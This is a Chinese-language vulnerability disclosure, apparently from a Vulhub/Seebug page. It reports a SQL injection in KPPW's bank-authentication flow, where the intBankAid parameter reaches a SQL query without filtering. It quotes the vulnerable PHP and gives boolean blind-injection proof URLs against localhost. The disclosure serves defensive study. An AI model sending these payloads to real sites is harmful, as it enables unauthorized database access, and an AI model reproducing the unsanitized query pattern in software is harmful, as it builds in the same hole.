VULHUB ™

### 简要描述： KPPW最新版SQL注入漏洞二 ### 详细说明： KPPW最新版SQL注入漏洞二 文件/control/user/account_auth.php ``` $arrAllowAuth = array('realname','enterprise','bank','mobile','email'); if ($code&&in_array($code,$arrAllowAuth)) { $code or $code = $keys ['0']; $code or kekezu::show_msg ( $_lang ['param_error'], "index.php?do=auth", 3, '', 'warning' ); $auth_class = "keke_auth_" . $code . "_class"; $objAuth = new $auth_class ( $code ); $auth_item = $arrAllAuthItems [$code]; $auth_dir = $auth_item ['auth_dir']; $arrAuthInfo = $objAuth->get_user_auth_info ( $gUid, 0, $intBankAid ); require S_ROOT . "/auth/$code/control/index.php"; require keke_tpl_class::template ( 'auth/' . $code . '/tpl/' . $_K ['template'] . '/'.$step ); die; } else { $real_pass = keke_auth_fac_class::auth_check ( 'enterprise', $gUid ) or $real_pass = keke_auth_fac_class::auth_check ( "realname", $gUid ); $arrHasAuthItem = keke_auth_fac_class::get_auth ( $gUserInfo ); $arrUserAuthInfo = $arrHasAuthItem ['info']; } ``` 仔细看看这里的： ```...

### 简要描述： KPPW最新版SQL注入漏洞二 ### 详细说明： KPPW最新版SQL注入漏洞二 文件/control/user/account_auth.php ``` $arrAllowAuth = array('realname','enterprise','bank','mobile','email'); if ($code&&in_array($code,$arrAllowAuth)) { $code or $code = $keys ['0']; $code or kekezu::show_msg ( $_lang ['param_error'], "index.php?do=auth", 3, '', 'warning' ); $auth_class = "keke_auth_" . $code . "_class"; $objAuth = new $auth_class ( $code ); $auth_item = $arrAllAuthItems [$code]; $auth_dir = $auth_item ['auth_dir']; $arrAuthInfo = $objAuth->get_user_auth_info ( $gUid, 0, $intBankAid ); require S_ROOT . "/auth/$code/control/index.php"; require keke_tpl_class::template ( 'auth/' . $code . '/tpl/' . $_K ['template'] . '/'.$step ); die; } else { $real_pass = keke_auth_fac_class::auth_check ( 'enterprise', $gUid ) or $real_pass = keke_auth_fac_class::auth_check ( "realname", $gUid ); $arrHasAuthItem = keke_auth_fac_class::get_auth ( $gUserInfo ); $arrUserAuthInfo = $arrHasAuthItem ['info']; } ``` 仔细看看这里的： ``` $arrAuthInfo = $objAuth->get_user_auth_info ( $gUid, 0, $intBankAid ); ``` 这里的变量$intBankAid进入了函数get_user_auth_info函数 跟进函数get_user_auth_info 文件/lib/sys/keke_auth_base_class.php： ``` public function get_user_auth_info($uid,$is_username=0,$show_id=''){ $sql="select * from ".TABLEPRE.$this->_auth_table_name; if($uid){ $is_username=='0' and $sql.=" where uid = '$uid' " or $sql.=" where username = '$uid' "; $show_id and $sql.=" and ".$this->_primary_key."=".$show_id; $sql .=" order by $this->_primary_key desc"; $data = db_factory::query($sql); if(sizeof($data)==1){ return $data[0]; }else{ return $data; } }else{ return array(); } } ``` 接收到的变量$intBankAid——$show_id，然后$show_id进入$sql 整个过程中变量$intBankAid未过滤，最后进入$sql进入数据库，导致sql注入漏洞 ### 漏洞证明： 盲注证明： ``` http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=account&op=auth&code=bank&step=step2&intBankAid=147 and 1=1 ``` [<img src="https://images.seebug.org/upload/201412/06225747722702352c15a78e45d58540772776b1.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/06225747722702352c15a78e45d58540772776b1.png) ``` http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=account&op=auth&code=bank&step=step2&intBankAid=147 and 1=2 ``` [<img src="https://images.seebug.org/upload/201412/06225800b5fa7be4805496855e497bac4340f787.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/06225800b5fa7be4805496855e497bac4340f787.png) 数据库执行记录： [<img src="https://images.seebug.org/upload/201412/062258161511485ba1aadc5d69092d4b3ef5548d.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/062258161511485ba1aadc5d69092d4b3ef5548d.png)